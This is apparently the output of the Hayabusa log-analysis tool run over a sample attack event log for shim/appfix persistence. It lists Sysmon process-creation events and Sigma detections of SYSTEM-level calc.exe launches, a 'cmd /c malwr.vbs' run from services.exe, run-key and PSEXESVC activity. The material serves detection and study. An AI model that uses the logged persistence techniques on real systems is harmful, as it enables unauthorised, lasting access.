Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 